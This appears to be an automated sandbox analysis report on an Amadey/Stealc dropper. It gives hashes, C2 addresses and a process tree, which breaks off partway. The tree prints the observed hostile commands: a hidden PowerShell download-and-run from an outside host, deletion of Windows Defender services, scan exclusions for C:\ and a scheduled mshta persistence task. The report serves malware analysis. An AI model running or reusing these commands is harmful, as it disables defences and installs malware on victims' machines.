Analysis

  • max time kernel
    90s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 04:03

General

  • Target

    5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe

  • Size

    1.8MB

  • MD5

    7af72d60902f6d9bd4ddb565cd4b0946

  • SHA1

    9a81b3d5d58e5f5ad4719dcf4ff3f5c59aebbebc

  • SHA256

    5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5

  • SHA512

    d4429d47082bb917e84a031cf71fb62fdbf4c7b77febde69fee4188b21da2d97b00d3f02d25f08226124b84a7df030a6d00ffd1fc43df66a1554582f5b462c50

  • SSDEEP

    49152:Sw+XuSlBp9q3mmc5+d8hJC6gPJ/ReTbdVM:pAuSl39q3mmc5+d8nNgFReTZV

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 12 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 26 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe
    "C:\Users\Admin\AppData\Local\Temp\5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:724
      • C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4244
        • C:\Users\Admin\AppData\Local\Temp\11.exe
          "C:\Users\Admin\AppData\Local\Temp\11.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4172
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\AFB9.tmp\AFBA.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5076
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B21A.tmp\B21B.tmp\B21C.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:548
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:2832
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:4644
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:4204
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1828
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:4676
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:4176
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:1032
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:3508
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:2952
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:404
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:4004
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:2100
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:4276
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:4020
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:2352
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:112
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:1784
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:1564
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:704
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:2452
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                          • Modifies security service
                          PID:1760
                        • C:\Windows\system32\sc.exe
                          sc stop "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:2640
                        • C:\Windows\system32\sc.exe
                          sc delete "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:4048
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                          8⤵
                            PID:3564
                          • C:\Windows\system32\sc.exe
                            sc stop "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:1932
                          • C:\Windows\system32\sc.exe
                            sc delete "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:2372
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                            8⤵
                              PID:3296
                            • C:\Windows\system32\sc.exe
                              sc stop "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:1200
                            • C:\Windows\system32\sc.exe
                              sc delete "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:3264
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                              8⤵
                                PID:3600
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:776
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:4664
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                8⤵
                                  PID:1392
                                • C:\Windows\system32\sc.exe
                                  sc stop "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:4316
                                • C:\Windows\system32\sc.exe
                                  sc delete "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:3828
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                  8⤵
                                    PID:1204
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2140
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:4220
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                    8⤵
                                      PID:1100
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:5020
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:4828
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                      8⤵
                                        PID:3336
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2588
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1780
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                        8⤵
                                          PID:4620
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:3048
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1852
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                          8⤵
                                            PID:4496
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:4476
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:4880
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                            8⤵
                                              PID:4884
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4128
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4228
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                              8⤵
                                                PID:232
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                8⤵
                                                  PID:3252
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                  8⤵
                                                    PID:968
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                    8⤵
                                                      PID:1236
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                      8⤵
                                                        PID:628
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:2068
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:4920
                                            • C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: MapViewOfSection
                                              PID:1620
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                4⤵
                                                  PID:3728
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3508
                                                • C:\Windows\system32\svchost.exe
                                                  "C:\Windows\system32\svchost.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • Adds Run key to start application
                                                  PID:2896
                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                    5⤵
                                                    • Sets service image path in registry
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: LoadsDriver
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:412
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Add-MpPreference -ExclusionPath C:\
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6032
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Remove-MpPreference -ExclusionPath C:\
                                                      6⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1760
                                                  • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                    5⤵
                                                    • Deletes itself
                                                    • Executes dropped EXE
                                                    PID:2912
                                                    • C:\Users\Admin\AppData\Local\Temp\{b5a5bf35-b578-4408-b836-6bfca3511e43}\3682b59.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\{b5a5bf35-b578-4408-b836-6bfca3511e43}\3682b59.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6696
                                                      • C:\Users\Admin\AppData\Local\Temp\{68f4c23a-4cbc-495e-983f-e8146fbc9b1b}\6c9171d9.exe
                                                        C:/Users/Admin/AppData/Local/Temp/{68f4c23a-4cbc-495e-983f-e8146fbc9b1b}/\6c9171d9.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                        7⤵
                                                        • Drops file in Drivers directory
                                                        • Sets service image path in registry
                                                        • Executes dropped EXE
                                                        • Impair Defenses: Safe Mode Boot
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • Enumerates connected drives
                                                        • Writes to the Master Boot Record (MBR)
                                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: LoadsDriver
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:12580
                                              • C:\Users\Admin\AppData\Local\Temp\10337530101\f2839c3fc6.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337530101\f2839c3fc6.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:3912
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn hJihtmaR798 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:552
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn hJihtmaR798 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2416
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta
                                                  4⤵
                                                  • Checks computer location settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3600
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1100
                                                    • C:\Users\Admin\AppData\Local\TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE
                                                      "C:\Users\Admin\AppData\Local\TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:7036
                                              • C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
                                                3⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                PID:1932
                                                • C:\Windows\SysWOW64\CMD.exe
                                                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5224
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:8904
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr /I "opssvc wrsa"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:8680
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:8468
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:8452
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c md 418377
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:8312
                                                  • C:\Windows\SysWOW64\extrac32.exe
                                                    extrac32 /Y /E Leon.cab
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:208
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr /V "BEVERAGES" Compilation
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7964
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7844
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7556
                                                  • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                    Passwords.com N
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:7404
                                                  • C:\Windows\SysWOW64\choice.exe
                                                    choice /d y /t 5
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7224
                                              • C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:11164
                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5128
                                              • C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:8888
                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3132
                                              • C:\Users\Admin\AppData\Local\Temp\10337930101\c8b4d5e382.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337930101\c8b4d5e382.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4460
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  4⤵
                                                    PID:3388
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3964
                                                • C:\Users\Admin\AppData\Local\Temp\10337940101\39d1db7685.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10337940101\39d1db7685.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:6088
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    4⤵
                                                      PID:5708
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5692
                                                  • C:\Users\Admin\AppData\Local\Temp\10337950101\327e56b382.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10337950101\327e56b382.exe"
                                                    3⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:9304
                                                  • C:\Users\Admin\AppData\Local\Temp\10337960101\d5e3ea69b4.exe
